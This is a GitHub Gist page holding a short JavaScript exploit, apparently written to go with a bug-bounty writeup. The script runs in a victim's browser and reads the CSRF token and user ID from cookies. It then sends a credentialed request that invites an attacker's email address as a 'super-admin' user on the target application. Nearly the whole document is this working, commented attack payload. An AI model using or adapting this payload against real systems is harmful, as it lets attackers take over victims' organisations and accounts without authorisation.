Skip to content

Instantly share code, notes, and snippets.

@Melotover

Melotover/js_exploit.js Secret

Last active Mar 24, 2021
Embed
What would you like to do?
for writeup!
var email = "ATTACKER_EMAIl";
// Set the attacker email that we will receive the invitation to it.
var csrf= document.cookie.split('; ').find(row => row.startsWith('example-csrf')).split('=')[1];
// Getting the csrf value from [example-csrf] cookie parameter and store it in the csrf variable.
var pid= document.cookie.split('; ').find(row => row.startsWith('USER_ID')).split('=')[1];
// Getting the pid value from [USER_ID] cookie parameter and store it in the pid variable.
// Initiate the XHR POST request that holds the data we collect!
var http=new XMLHttpRequest();
http.open('POST','https://api.example.com/app/v1/users/add/?Pid='+pid+'&clienttimeout=14000&app=users&version=1.0', true);
http.withCredentials=true;
// To send the victim cookies with the request!
http.setRequestHeader('X-example-CSRF',csrf);
http.setRequestHeader('Content-type','application/json');
// Setting the required headers!
http.send('{"users":[{"email":"'+email+'" ,"emailSent":true,"firstName":"","lastName":"","roleNames":[],"jita":false,"expiresAt":null,"primaryTeamId":-1,"secondaryTeamIds":[],"partner":false,"pending":false,"existingInexample":false,"hasTwoFactorBackupCodes":false,"hasTwoFactorConfigured":false,"userAssetsCount":null,"scim":false}],"roleNames":["super-admin"],"teamId":null,"secondaryTeamIds":[],"sendWelcomeEmail":true,"forceWelcomeEmail":true}');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment